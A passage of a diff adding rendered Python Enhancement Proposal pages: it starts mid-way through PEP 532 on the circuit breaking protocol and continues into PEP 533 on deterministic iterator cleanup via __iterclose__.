+not operator.false(LHS) else RHS  # Preceding "LHS if " implied
+LHS if operator.true(RHS)         # Trailing " else RHS" implied
+LHS if operator.false(RHS)        # Trailing " else RHS" implied
+LHS if not operator.true(RHS)     # Trailing " else RHS" implied
+LHS if not operator.false(RHS)    # Trailing " else RHS" implied
+
+
+

And also reads well for binary checks:

+
operator.is_sentinel(VALUE, SENTINEL) else EXPR
+operator.is_not_sentinel(VALUE, SENTINEL) else EXPR
+EXPR if operator.is_sentinel(VALUE, SENTINEL)
+EXPR if operator.is_not_sentinel(VALUE, SENTINEL)
+
+
+
+
+
+

Risks and concerns

+

This PEP has been designed specifically to address the risks and concerns +raised when discussing PEPs 335, 505 and 531.

+
    +
  • it defines new operators and adjusts the definition of chained comparison +(in a separate PEP) rather than impacting the existing and and or +operators
  • +
  • the proposed new operators are general purpose short-circuiting binary +operators that can even be used to express the existing semantics of and +and or rather than focusing solely and inflexibly on identity checking +against None
  • +
  • the changes to the not unary operator and the is and is not +binary comparison operators are defined in such a way that control flow +optimisations based on the existing semantics remain valid
  • +
+

One consequence of this approach is that this PEP on its own doesn’t produce +much in the way of direct benefits to end users aside from making it possible +to omit some common None if prefixes and else None suffixes from +particular forms of conditional expression.

+

Instead, what it mainly provides is a common foundation that would allow the +None-aware operator proposals in PEP 505 and the rich comparison chaining +proposal in PEP 535 to be pursued atop a common underlying semantic framework +that would also be shared with conditional expressions and the existing and +and or operators.

+
+
+

Design Discussion

+
+

Protocol walk-through

+

The following diagram illustrates the core concepts behind the circuit +breaking protocol (although it glosses over the technical detail of looking +up the special methods via the type rather than the instance):

+[figure: circuit breaking protocol applied to a ternary expression] +

We will work through the following expression:

+
>>> def is_not_none(obj):
+...     return operator.is_not_sentinel(obj, None)
+>>> x if is_not_none(data.get("key")) else y
+
+
+

is_not_none is a helper function that invokes the proposed operator.is_not_sentinel factory (which returns a types.CircuitBreaker instance) with None as the sentinel value. data is a container (such as a builtin dict instance) that returns None when the get() method is called with an unknown key.

+

We can rewrite the example to give a name to the circuit breaker instance:

+
>>> maybe_value = is_not_none(data.get("key"))
+>>> x if maybe_value else y
+
+
+

Here the maybe_value circuit breaker instance corresponds to breaker +in the diagram.

+

The ternary condition is evaluated by calling bool(maybe_value), which is the same as Python’s existing behaviour. The change in behaviour is that instead of directly returning one of the operands x or y, the circuit breaking protocol passes the relevant operand to the circuit breaker used in the condition.

+

If bool(maybe_value) evaluates to True (i.e. the requested +key exists and its value is not None) then the interpreter calls +type(maybe_value).__then__(maybe_value, x). Otherwise, it calls +type(maybe_value).__else__(maybe_value, y).

+

The protocol also applies to the new if and else binary operators, +but in these cases, the interpreter needs a way to indicate the missing third +operand. It does this by re-using the circuit breaker itself in that role.

+

Consider these two expressions:

+
>>> x if data.get("key") is None
+>>> x if operator.is_sentinel(data.get("key"), None)
+
+
+

The first form of this expression returns x if data.get("key") is None, +but otherwise returns False, which almost certainly isn’t what we want.

+

By contrast, the second form of this expression still returns x if +data.get("key") is None, but otherwise returns data.get("key"), which +is significantly more useful behaviour.

+

We can understand this behavior by rewriting it as a ternary expression with +an explicitly named circuit breaker instance:

+
>>> maybe_value = operator.is_sentinel(data.get("key"), None)
+>>> x if maybe_value else maybe_value
+
+
+

If bool(maybe_value) is True (i.e. data.get("key") is None), +then the interpreter calls type(maybe_value).__then__(maybe_value, x). The +implementation of types.CircuitBreaker.__then__ doesn’t see anything that +indicates short-circuiting has taken place, and hence returns x.

+

By contrast, if bool(maybe_value) is False (i.e. data.get("key") +is not None), the interpreter calls +type(maybe_value).__else__(maybe_value, maybe_value). The implementation of +types.CircuitBreaker.__else__ detects that the instance method has received +itself as its argument and returns the wrapped value (i.e. data.get("key")) +rather than the circuit breaker.

+

The same logic applies to else, only reversed:

+
>>> is_not_none(data.get("key")) else y
+
+
+

This expression returns data.get("key") if it is not None, otherwise it +evaluates and returns y. To understand the mechanics, we rewrite the +expression as follows:

+
>>> maybe_value = is_not_none(data.get("key"))
+>>> maybe_value if maybe_value else y
+
+
+

If bool(maybe_value) is True, then the expression short-circuits and +the interpreter calls type(maybe_value).__then__(maybe_value, maybe_value). +The implementation of types.CircuitBreaker.__then__ detects that the +instance method has received itself as its argument and returns the wrapped +value (i.e. data.get("key")) rather than the circuit breaker.

+

If bool(maybe_value) is False, the interpreter calls +type(maybe_value).__else__(maybe_value, y). The implementation of +types.CircuitBreaker.__else__ doesn’t see anything that indicates +short-circuiting has taken place, and hence returns y.

+
+
+

Respecting De Morgan’s Laws

+

Similar to and and or, the binary short-circuiting operators will +permit multiple ways of writing essentially the same expression. This +seeming redundancy is unfortunately an implied consequence of defining the +protocol as a full boolean algebra, as boolean algebras respect a pair of +properties known as “De Morgan’s Laws”: the ability to express the results +of and and or operations in terms of each other and a suitable +combination of not operations.

+

For and and or in Python, these invariants can be described as follows:

+
assert bool(A and B) == bool(not (not A or not B))
+assert bool(A or B) == bool(not (not A and not B))
+
+
+

That is, if you take one of the operators, invert both operands, switch to the +other operator, and then invert the overall result, you’ll get the same +answer (in a boolean sense) as you did from the original operator. (This may +seem redundant, but in many situations it actually lets you eliminate double +negatives and find tautologically true or false subexpressions, thus reducing +the overall expression size).

+

For circuit breakers, defining a suitable invariant is complicated by the +fact that they’re often going to be designed to eliminate themselves from the +expression result when they’re short-circuited, which is an inherently +asymmetric behaviour. Accordingly, that inherent asymmetry needs to be +accounted for when mapping De Morgan’s Laws to the expected behaviour of +symmetric circuit breakers.

+

One way this complication can be addressed is to wrap the operand that would +otherwise short-circuit in operator.true, ensuring that when bool is +applied to the overall result, it uses the same definition of truth that was +used to decide which branch to evaluate, rather than applying bool directly +to the circuit breaker’s input value.

+
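
In terms of the sketch from the protocol walk-through above, operator.true can be thought of as the following factory (an illustrative assumption, reusing the hypothetical two-argument constructor from that sketch):

+
def true(obj):
+    # A circuit breaker whose truth state mirrors bool(obj), while still
+    # remembering obj itself for use in the selected branch
+    return CircuitBreaker(obj, bool(obj))
+
+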

Specifically, for the new short-circuiting operators, the following properties +would be reasonably expected to hold for any well-behaved symmetric circuit +breaker that implements both __bool__ and __not__:

+
assert bool(B if true(A)) == bool(not (true(not A) else not B))
+assert bool(true(A) else B) == bool(not (not B if true(not A)))
+
+
+

Note the order of operations on the right hand side (applying true +after inverting the input circuit breaker) - this ensures that an +assertion is actually being made about type(A).__not__, rather than +merely being about the behaviour of type(true(A)).__not__.

+

At the very least, types.CircuitBreaker instances would respect this +logic, allowing existing boolean expression optimisations (like double +negative elimination) to continue to be applied.

+
+
+

Arbitrary sentinel objects

+

Unlike PEPs 505 and 531, the proposal in this PEP readily handles custom +sentinel objects:

+
_MISSING = object()
+
+# Using the sentinel to check whether or not an argument was supplied
+def my_func(arg=_MISSING):
+    arg = make_default() if is_sentinel(arg, _MISSING) # "else arg" implied
+
+
+
+
+

Implicitly defined circuit breakers in circuit breaking expressions

+

A never-posted draft of this PEP explored the idea of special casing the +is and is not binary operators such that they were automatically +treated as circuit breakers when used in the context of a circuit breaking +expression. Unfortunately, it turned out that this approach necessarily +resulted in one of two highly undesirable outcomes:

+
    +
  1. the return type of these expressions changed universally from bool to +types.CircuitBreaker, potentially creating a backwards compatibility +problem (especially when working with extension module APIs that +specifically look for a builtin boolean value with PyBool_Check rather +than passing the supplied value through PyObject_IsTrue or using +the p (predicate) format in one of the argument parsing functions)
  +
  2. the return type of these expressions became context dependent, meaning +that other routine refactorings (like pulling a comparison operation out +into a local variable) could have a significant impact on the runtime +semantics of a piece of code
  +
+

Neither of those possible outcomes seems warranted by the proposal in this PEP, +so it reverted to the current design where circuit breaker instances must be +created explicitly via API calls, and are never produced implicitly.

+
+
+
+

Implementation

+

As with PEP 505, actual implementation has been deferred pending in-principle +interest in the idea of making these changes.

+

…TBD…

+
+
+

Acknowledgements

+

Thanks go to Steven D’Aprano for his detailed critique [2] of the initial +draft of this PEP that inspired many of the changes in the second draft, as +well as to all of the other participants in that discussion thread [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0532.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0533/index.html b/pep-0533/index.html new file mode 100644 index 00000000000..f28fdd6b184 --- /dev/null +++ b/pep-0533/index.html @@ -0,0 +1,882 @@ + PEP 533 – Deterministic cleanup for iterators | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 533 – Deterministic cleanup for iterators

+
+
Author:
+
Nathaniel J. Smith
+
BDFL-Delegate:
+
Yury Selivanov <yury at edgedb.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
18-Oct-2016
+
Post-History:
+
18-Oct-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

We propose to extend the iterator protocol with a new +__(a)iterclose__ slot, which is called automatically on exit from +(async) for loops, regardless of how they exit. This allows for +convenient, deterministic cleanup of resources held by iterators +without reliance on the garbage collector. This is especially valuable +for asynchronous generators.

+
+
+

Note on timing

+

In practical terms, the proposal here is divided into two separate +parts: the handling of async iterators, which should ideally be +implemented ASAP, and the handling of regular iterators, which is a +larger but more relaxed project that can’t start until 3.7 at the +earliest. But since the changes are closely related, and we probably +don’t want to end up with async iterators and regular iterators +diverging in the long run, it seems useful to look at them together.

+
+
+

Background and motivation

+

Python iterables often hold resources which require cleanup. For +example: file objects need to be closed; the WSGI spec adds a close method +on top of the regular iterator protocol and demands that consumers +call it at the appropriate time (though forgetting to do so is a +frequent source of bugs); +and PEP 342 (based on PEP 325) extended generator objects to add a +close method to allow generators to clean up after themselves.

+

Generally, objects that need to clean up after themselves also define +a __del__ method to ensure that this cleanup will happen +eventually, when the object is garbage collected. However, relying on +the garbage collector for cleanup like this causes serious problems in +several cases:

+
    +
  • In Python implementations that do not use reference counting +(e.g. PyPy, Jython), calls to __del__ may be arbitrarily delayed +– yet many situations require prompt cleanup of +resources. Delayed cleanup produces problems like crashes due to +file descriptor exhaustion, or WSGI timing middleware that collects +bogus times.
  • +
  • Async generators (PEP 525) can only perform cleanup under the +supervision of the appropriate coroutine runner. __del__ doesn’t +have access to the coroutine runner; indeed, the coroutine runner +might be garbage collected before the generator object. So relying +on the garbage collector is effectively impossible without some kind +of language extension. (PEP 525 does provide such an extension, but +it has a number of limitations that this proposal fixes; see the +“alternatives” section below for discussion.)
  • +
+

Fortunately, Python provides a standard tool for doing resource +cleanup in a more structured way: with blocks. For example, this +code opens a file but relies on the garbage collector to close it:

+
def read_newline_separated_json(path):
+    for line in open(path):
+        yield json.loads(line)
+
+for document in read_newline_separated_json(path):
+    ...
+
+
+

and recent versions of CPython will point this out by issuing a +ResourceWarning, nudging us to fix it by adding a with block:

+
def read_newline_separated_json(path):
+    with open(path) as file_handle:      # <-- with block
+        for line in file_handle:
+            yield json.loads(line)
+
+for document in read_newline_separated_json(path):  # <-- outer for loop
+    ...
+
+
+

But there’s a subtlety here, caused by the interaction of with +blocks and generators. with blocks are Python’s main tool for +managing cleanup, and they’re a powerful one, because they pin the +lifetime of a resource to the lifetime of a stack frame. But this +assumes that someone will take care of cleaning up the stack +frame… and for generators, this requires that someone close +them.

+

In this case, adding the with block is enough to shut up the +ResourceWarning, but this is misleading – the file object cleanup +here is still dependent on the garbage collector. The with block +will only be unwound when the read_newline_separated_json +generator is closed. If the outer for loop runs to completion then +the cleanup will happen immediately; but if this loop is terminated +early by a break or an exception, then the with block won’t +fire until the generator object is garbage collected.

+

The correct solution requires that all users of this API wrap every +for loop in its own with block:

+
with closing(read_newline_separated_json(path)) as genobj:
+    for document in genobj:
+        ...
+
+
+

This gets even worse if we consider the idiom of decomposing a complex +pipeline into multiple nested generators:

+
def read_users(path):
+    with closing(read_newline_separated_json(path)) as gen:
+        for document in gen:
+            yield User.from_json(document)
+
+def users_in_group(path, group):
+    with closing(read_users(path)) as gen:
+        for user in gen:
+            if user.group == group:
+                yield user
+
+
+

In general if you have N nested generators then you need N+1 with +blocks to clean up 1 file. And good defensive programming would +suggest that any time we use a generator, we should assume the +possibility that there could be at least one with block somewhere +in its (potentially transitive) call stack, either now or in the +future, and thus always wrap it in a with. But in practice, +basically nobody does this, because programmers would rather write +buggy code than tiresome repetitive code. In simple cases like this +there are some workarounds that good Python developers know (e.g. in +this simple case it would be idiomatic to pass in a file handle +instead of a path and move the resource management to the top level), +but in general we cannot avoid the use of with/finally inside +of generators, and thus dealing with this problem one way or +another. When beauty and correctness fight then beauty tends to win, +so it’s important to make correct code beautiful.

+

Still, is this worth fixing? Until async generators came along I would +have argued yes, but that it was a low priority, since everyone seems +to be muddling along okay – but async generators make it much more +urgent. Async generators cannot do cleanup at all without some +mechanism for deterministic cleanup that people will actually use, and +async generators are particularly likely to hold resources like file +descriptors. (After all, if they weren’t doing I/O, they’d be +generators, not async generators.) So we have to do something, and it +might as well be a comprehensive fix to the underlying problem. And +it’s much easier to fix this now when async generators are first +rolling out, than it will be to fix it later.

+

The proposal itself is simple in concept: add a __(a)iterclose__ +method to the iterator protocol, and have (async) for loops call +it when the loop is exited, even if this occurs via break or +exception unwinding. Effectively, we’re taking the current cumbersome +idiom (with block + for loop) and merging them together into a +fancier for. This may seem non-orthogonal, but makes sense when +you consider that the existence of generators means that with +blocks actually depend on iterator cleanup to work reliably, plus +experience showing that iterator cleanup is often a desirable feature +in its own right.

+
+
+

Alternatives

+
+

PEP 525 asyncgen hooks

+

PEP 525 proposes a set of global thread-local hooks +managed by new sys.{get/set}_asyncgen_hooks() functions, which +allow event loops to integrate with the garbage collector to run +cleanup for async generators. In principle, this proposal and PEP 525 +are complementary, in the same way that with blocks and +__del__ are complementary: this proposal takes care of ensuring +deterministic cleanup in most cases, while PEP 525’s GC hooks clean up +anything that gets missed. But __aiterclose__ provides a number of +advantages over GC hooks alone:

+
    +
  • The GC hook semantics aren’t part of the abstract async iterator +protocol, but are instead restricted specifically to the async +generator concrete type. If +you have an async iterator implemented using a class, like:
    class MyAsyncIterator:
    +    async def __anext__(self):
    +        ...
    +
    +
    +

    then you can’t refactor this into an async generator without +changing its semantics, and vice-versa. This seems very +unpythonic. (It also leaves open the question of what exactly +class-based async iterators are supposed to do, given that they face +exactly the same cleanup problems as async generators.) +__aiterclose__, on the other hand, is defined at the protocol +level, so it’s duck-type friendly and works for all iterators, not +just generators.

    +
  • +
  • Code that wants to work on non-CPython implementations like PyPy +cannot in general rely on GC for cleanup. Without +__aiterclose__, it’s more or less guaranteed that developers who +develop and test on CPython will produce libraries that leak +resources when used on PyPy. Developers who do want to target +alternative implementations will either have to take the defensive +approach of wrapping every for loop in a with block, or else +carefully audit their code to figure out which generators might +possibly contain cleanup code and add with blocks around those +only. With __aiterclose__, writing portable code becomes easy +and natural.
  • +
  • An important part of building robust software is making sure that +exceptions always propagate correctly without being lost. One of the +most exciting things about async/await compared to traditional +callback-based systems is that instead of requiring manual chaining, +the runtime can now do the heavy lifting of propagating errors, +making it much easier to write robust code. But, this beautiful +new picture has one major gap: if we rely on the GC for generator +cleanup, then exceptions raised during cleanup are lost. So, again, +without __aiterclose__, developers who care about this kind of +robustness will either have to take the defensive approach of +wrapping every for loop in a with block, or else carefully +audit their code to figure out which generators might possibly +contain cleanup code. __aiterclose__ plugs this hole by +performing cleanup in the caller’s context, so writing more robust +code becomes the path of least resistance.
  • +
  • The WSGI experience suggests that there exist important +iterator-based APIs that need prompt cleanup and cannot rely on the +GC, even in CPython. For example, consider a hypothetical WSGI-like +API based around async/await and async iterators, where a response +handler is an async generator that takes request headers + an async +iterator over the request body, and yields response headers + the +response body. (This is actually the use case that got me interested +in async generators in the first place, i.e. this isn’t +hypothetical.) If we follow WSGI in requiring that child iterators +must be closed properly, then without __aiterclose__ the +absolute most minimalistic middleware in our system looks something +like:
    async def noop_middleware(handler, request_header, request_body):
    +    async with aclosing(handler(request_header, request_body)) as aiter:
    +        async for response_item in aiter:
    +            yield response_item
    +
    +
    +

    Arguably in regular code one can get away with skipping the with +block around for loops, depending on how confident one is that +one understands the internal implementation of the generator. But +here we have to cope with arbitrary response handlers, so without +__aiterclose__, this with construction is a mandatory part +of every middleware.

    +

    __aiterclose__ allows us to eliminate the mandatory boilerplate +and an extra level of indentation from every middleware:

    +
    async def noop_middleware(handler, request_header, request_body):
    +    async for response_item in handler(request_header, request_body):
    +        yield response_item
    +
    +
    +
  • +
+

So the __aiterclose__ approach provides substantial advantages +over GC hooks.

+

This leaves open the question of whether we want a combination of GC +hooks + __aiterclose__, or just __aiterclose__ alone. Since +the vast majority of generators are iterated over using a for loop +or equivalent, __aiterclose__ handles most situations before the +GC has a chance to get involved. The case where GC hooks provide +additional value is in code that does manual iteration, e.g.:

+
agen = fetch_newline_separated_json_from_url(...)
+while True:
+    document = await type(agen).__anext__(agen)
+    if document["id"] == needle:
+        break
+# doesn't do 'await agen.aclose()'
+
+
+

If we go with the GC-hooks + __aiterclose__ approach, this +generator will eventually be cleaned up by GC calling the generator +__del__ method, which then will use the hooks to call back into +the event loop to run the cleanup code.

+

If we go with the no-GC-hooks approach, this generator will eventually +be garbage collected, with the following effects:

+
    +
  • its __del__ method will issue a warning that the generator was +not closed (similar to the existing “coroutine never awaited” +warning).
  • +
  • The underlying resources involved will still be cleaned up, because +the generator frame will still be garbage collected, causing it to +drop references to any file handles or sockets it holds, and then +those objects’ __del__ methods will release the actual +operating system resources.
  • +
  • But, any cleanup code inside the generator itself (e.g. logging, +buffer flushing) will not get a chance to run.
  • +
+

The solution here – as the warning would indicate – is to fix the +code so that it calls __aiterclose__, e.g. by using a with +block:

+
async with aclosing(fetch_newline_separated_json_from_url(...)) as agen:
+    while True:
+        document = await type(agen).__anext__(agen)
+        if document["id"] == needle:
+            break
+
+
+

Basically in this approach, the rule would be that if you want to +manually implement the iterator protocol, then it’s your +responsibility to implement all of it, and that now includes +__(a)iterclose__.

+

GC hooks add non-trivial complexity in the form of (a) new global +interpreter state, (b) a somewhat complicated control flow (e.g., +async generator GC always involves resurrection, so the details of PEP +442 are important), and (c) a new public API in asyncio (await +loop.shutdown_asyncgens()) that users have to remember to call at +the appropriate time. (This last point in particular somewhat +undermines the argument that GC hooks provide a safe backup to +guarantee cleanup, since if shutdown_asyncgens() isn’t called +correctly then I think it’s possible for generators to be silently +discarded without their cleanup code being called; compare this to the +__aiterclose__-only approach where in the worst case we still at +least get a warning printed. This might be fixable.) All this +considered, GC hooks arguably aren’t worth it, given that the only +people they help are those who want to manually call __anext__ yet +don’t want to manually call __aiterclose__. But Yury disagrees +with me on this :-). And both options are viable.

+
+
+

Always inject resources, and do all cleanup at the top level

+

Several commentators on python-dev and python-ideas have suggested +that a pattern to avoid these problems is to always pass resources in +from above, e.g. read_newline_separated_json should take a file +object rather than a path, with cleanup handled at the top level:

+
def read_newline_separated_json(file_handle):
+    for line in file_handle:
+        yield json.loads(line)
+
+def read_users(file_handle):
+    for document in read_newline_separated_json(file_handle):
+        yield User.from_json(document)
+
+with open(path) as file_handle:
+    for user in read_users(file_handle):
+        ...
+
+
+

This works well in simple cases; here it lets us avoid the “N+1 +with blocks problem”. But unfortunately, it breaks down quickly +when things get more complex. Consider if instead of reading from a +file, our generator was reading from a streaming HTTP GET request – +while handling redirects and authentication via OAuth. Then we’d +really want the sockets to be managed down inside our HTTP client +library, not at the top level. Plus there are other cases where +finally blocks embedded inside generators are important in their +own right: database transaction management, emitting logging information +during cleanup (one of the major motivating use cases for WSGI +close), and so forth. So this is really a workaround for simple +cases, not a general solution.

+
+
+

More complex variants of __(a)iterclose__

+

The semantics of __(a)iterclose__ are somewhat inspired by +with blocks, but context managers are more powerful: +__(a)exit__ can distinguish between a normal exit versus exception +unwinding, and in the case of an exception it can examine the +exception details and optionally suppress +propagation. __(a)iterclose__ as proposed here does not have these +powers, but one can imagine an alternative design where it did.

+

However, this seems like unwarranted complexity: experience suggests +that it’s common for iterables to have close methods, and even to +have __exit__ methods that call self.close(), but I’m not +aware of any common cases that make use of __exit__’s full +power. I also can’t think of any examples where this would be +useful. And it seems unnecessarily confusing to allow iterators to +affect flow control by swallowing exceptions – if you’re in a +situation where you really want that, then you should probably use a +real with block anyway.

+
+
+
+

Specification

+

This section describes where we want to eventually end up, though +there are some backwards compatibility issues that mean we can’t jump +directly here. A later section describes the transition plan.

+
+

Guiding principles

+

Generally, __(a)iterclose__ implementations should:

+
    +
  • be idempotent,
  • +
  • perform any cleanup that is appropriate on the assumption that the +iterator will not be used again after __(a)iterclose__ is +called. In particular, once __(a)iterclose__ has been called +then calling __(a)next__ produces undefined behavior.
  • +
+

And generally, any code which starts iterating through an iterable +with the intention of exhausting it, should arrange to make sure that +__(a)iterclose__ is eventually called, whether or not the iterator +is actually exhausted.

+
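
A sketch of an iterator type following these guidelines (the wrapped resource object, with its read_next() and release() methods, is hypothetical):

+
class ClosingIterator:
+    def __init__(self, resource):
+        self._resource = resource
+        self._closed = False
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        if self._closed:
+            # Behaviour after close is undefined; raising is one safe choice
+            raise StopIteration
+        return self._resource.read_next()
+
+    def __iterclose__(self):
+        if not self._closed:  # idempotent: safe to call more than once
+            self._closed = True
+            self._resource.release()
+
+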
+
+

Changes to iteration

+

The core proposal is the change in behavior of for loops. Given +this Python code:

+
for VAR in ITERABLE:
+    LOOP-BODY
+else:
+    ELSE-BODY
+
+
+

we desugar to the equivalent of:

+
_iter = iter(ITERABLE)
+_iterclose = getattr(type(_iter), "__iterclose__", lambda it: None)
+try:
+    traditional-for VAR in _iter:
+        LOOP-BODY
+    else:
+        ELSE-BODY
+finally:
+    _iterclose(_iter)
+
+
+

where the “traditional-for statement” here is meant as a shorthand for +the classic 3.5-and-earlier for loop semantics.

+

Besides the top-level for statement, Python also contains several +other places where iterators are consumed. For consistency, these +should call __iterclose__ as well using semantics equivalent to +the above. This includes:

+
    +
  • for loops inside comprehensions
  • +
  • * unpacking
  • +
  • functions which accept and fully consume iterables, like +list(it), tuple(it), itertools.product(it1, it2, ...), +and others.
  • +
+
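
A sketch of the semantics that consuming functions like list() would then need, mirroring the for loop desugaring above (operator.iterclose is the convenience function proposed later in this PEP):

+
def _list_with_iterclose(iterable):
+    _iter = iter(iterable)
+    try:
+        result = []
+        while True:
+            try:
+                result.append(next(_iter))
+            except StopIteration:
+                return result
+    finally:
+        operator.iterclose(_iter)
+
+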

In addition, a yield from that successfully exhausts the called +generator should as a last step call its __iterclose__ +method. (Rationale: yield from already links the lifetime of the +calling generator to the called generator; if the calling generator is +closed when half-way through a yield from, then this will already +automatically close the called generator.)

+
+
+

Changes to async iteration

+

We also make the analogous changes to async iteration constructs, +except that the new slot is called __aiterclose__, and it’s an +async method that gets awaited.

+
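
A sketch of the corresponding async desugaring, written as a helper coroutine whose shape mirrors the synchronous version above (body stands in for the loop body):

+
async def _async_for_with_cleanup(iterable, body):
+    ait = iterable.__aiter__()
+    aiterclose = getattr(type(ait), "__aiterclose__", None)
+    try:
+        while True:
+            try:
+                item = await type(ait).__anext__(ait)
+            except StopAsyncIteration:
+                break
+            await body(item)
+    finally:
+        if aiterclose is not None:
+            await aiterclose(ait)
+
+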
+
+

Modifications to basic iterator types

+

Generator objects (including those created by generator +comprehensions):

+
    +
  • __iterclose__ calls self.close()
  • +
  • __del__ calls self.close() (same as now), and additionally +issues a ResourceWarning if the generator wasn’t exhausted. This +warning is hidden by default, but can be enabled for those who want +to make sure they aren’t inadvertently relying on CPython-specific +GC semantics.
  • +
+

Async generator objects (including those created by async generator +comprehensions):

+
    +
  • __aiterclose__ calls self.aclose()
  • +
  • __del__ issues a RuntimeWarning if aclose has not been +called, since this probably indicates a latent bug, similar to the +“coroutine never awaited” warning.
  • +
+

QUESTION: should file objects implement __iterclose__ to close the +file? On the one hand this would make this change more disruptive; on +the other hand people really like writing for line in open(...): +..., and if we get used to iterators taking care of their own +cleanup then it might become very weird if files don’t.

+
+
+

New convenience functions

+

The operator module gains two new functions, with semantics +equivalent to the following:

+
def iterclose(it):
+    if not isinstance(it, collections.abc.Iterator):
+        raise TypeError("not an iterator")
+    if hasattr(type(it), "__iterclose__"):
+        type(it).__iterclose__(it)
+
+async def aiterclose(ait):
+    if not isinstance(ait, collections.abc.AsyncIterator):
+        raise TypeError("not an async iterator")
+    if hasattr(type(ait), "__aiterclose__"):
+        await type(ait).__aiterclose__(ait)
+
+
+

The itertools module gains a new iterator wrapper that can be used +to selectively disable the new __iterclose__ behavior:

+
# QUESTION: I feel like there might be a better name for this one?
+class preserve:
+    def __init__(self, iterable):
+        self._it = iter(iterable)
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        return next(self._it)
+
+    def __iterclose__(self):
+        # Swallow __iterclose__ without passing it on
+        pass
+
+
+

Example usage (assuming that file objects implement +__iterclose__):

+
with open(...) as handle:
+    # Iterate through the same file twice:
+    for line in itertools.preserve(handle):
+        ...
+    handle.seek(0)
+    for line in itertools.preserve(handle):
+        ...
+
+
+
@contextlib.contextmanager
+def iterclosing(iterable):
+    it = iter(iterable)
+    try:
+        yield preserve(it)
+    finally:
+        iterclose(it)
+
+
+
+
+

__iterclose__ implementations for iterator wrappers

+

Python ships a number of iterator types that act as wrappers around +other iterators: map, zip, itertools.accumulate, +csv.reader, and others. These iterators should define a +__iterclose__ method which calls __iterclose__ in turn on +their underlying iterators. For example, map could be implemented +as:

+
# Helper function
+def map_chaining_exceptions(fn, items, last_exc=None):
+    for item in items:
+        try:
+            fn(item)
+        except BaseException as new_exc:
+            if new_exc.__context__ is None:
+                new_exc.__context__ = last_exc
+            last_exc = new_exc
+    if last_exc is not None:
+        raise last_exc
+
+class map:
+    def __init__(self, fn, *iterables):
+        self._fn = fn
+        self._iters = [iter(iterable) for iterable in iterables]
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        return self._fn(*[next(it) for it in self._iters])
+
+    def __iterclose__(self):
+        map_chaining_exceptions(operator.iterclose, self._iters)
+
+def chain(*iterables):
+    iterables = list(iterables)  # need a mutable list to pop from
+    try:
+        while iterables:
+            for element in iterables.pop(0):
+                yield element
+    except BaseException as e:
+        def iterclose_iterable(iterable):
+            operator.iterclose(iter(iterable))
+        map_chaining_exceptions(iterclose_iterable, iterables, last_exc=e)
+
+
+

In some cases this requires some subtlety; for example, itertools.tee +should not call __iterclose__ on the underlying iterator until it +has been called on all of the clone iterators.

+
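
One way the tee clones could coordinate is through a shared record that counts the unclosed clones; this particular bookkeeping scheme is an illustrative assumption, not part of the proposal's text:

+
class _TeeClone:
+    def __init__(self, shared):
+        # shared is e.g. {"source": underlying_iter, "open_clones": n}
+        self._shared = shared
+        self._closed = False
+
+    def __iterclose__(self):
+        if self._closed:
+            return
+        self._closed = True
+        self._shared["open_clones"] -= 1
+        if self._shared["open_clones"] == 0:
+            # Only the last surviving clone closes the underlying iterator
+            operator.iterclose(self._shared["source"])
+
+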
+
+

Example / Rationale

+

The payoff for all this is that we can now write straightforward code +like:

+
def read_newline_separated_json(path):
+    for line in open(path):
+        yield json.loads(line)
+
+
+

and be confident that the file will receive deterministic cleanup +without the end-user having to take any special effort, even in +complex cases. For example, consider this silly pipeline:

+
list(map(lambda key: key.upper(),
+         doc["key"] for doc in read_newline_separated_json(path)))
+
+
+

If our file contains a document where doc["key"] turns out to be +an integer, then the following sequence of events will happen:

+
    +
  1. key.upper() raises an AttributeError, which propagates out +of the map and triggers the implicit finally block inside +list.
  +
  2. The finally block in list calls __iterclose__() on the +map object.
  +
  3. map.__iterclose__() calls __iterclose__() on the generator +comprehension object.
  +
  4. This injects a GeneratorExit exception into the generator +comprehension body, which is currently suspended inside the +comprehension’s for loop body.
  +
  5. The exception propagates out of the for loop, triggering the +for loop’s implicit finally block, which calls +__iterclose__ on the generator object representing the call to +read_newline_separated_json.
  +
  6. This injects an inner GeneratorExit exception into the body of +read_newline_separated_json, currently suspended at the +yield.
  +
  7. The inner GeneratorExit propagates out of the for loop, +triggering the for loop’s implicit finally block, which +calls __iterclose__() on the file object.
  +
  8. The file object is closed.
  +
  9. The inner GeneratorExit resumes propagating, hits the boundary +of the generator function, and causes +read_newline_separated_json’s __iterclose__() method to +return successfully.
  +
  10. Control returns to the generator comprehension body, and the outer +GeneratorExit continues propagating, allowing the +comprehension’s __iterclose__() to return successfully.
  +
  11. The rest of the __iterclose__() calls unwind without incident, +back into the body of list.
  +
  12. The original AttributeError resumes propagating.
  +
+

(The details above assume that we implement file.__iterclose__; if +not then add a with block to read_newline_separated_json and +essentially the same logic goes through.)

+

Of course, from the user’s point of view, this can be simplified down +to just:

+

1. key.upper() raises an AttributeError. +2. The file object is closed. +3. The AttributeError propagates out of list.

+

So we’ve accomplished our goal of making this “just work” without the +user having to think about it.

+
+
+
+

Transition plan

+

While the majority of existing for loops will continue to produce +identical results, the proposed changes will produce +backwards-incompatible behavior in some cases. Example:

+
def read_csv_with_header(lines_iterable):
+    lines_iterator = iter(lines_iterable)
+    for line in lines_iterator:
+        column_names = line.strip().split("\t")
+        break
+    for line in lines_iterator:
+        values = line.strip().split("\t")
+        record = dict(zip(column_names, values))
+        yield record
+
+
+

This code used to be correct, but after this proposal is implemented +will require an itertools.preserve call added to the first for +loop.

+
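
Under this proposal, the corrected version would look something like this (using the itertools.preserve wrapper proposed above):

+
def read_csv_with_header(lines_iterable):
+    lines_iterator = iter(lines_iterable)
+    # preserve() stops the first loop from closing the shared iterator
+    for line in itertools.preserve(lines_iterator):
+        column_names = line.strip().split("\t")
+        break
+    for line in lines_iterator:
+        values = line.strip().split("\t")
+        record = dict(zip(column_names, values))
+        yield record
+
+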

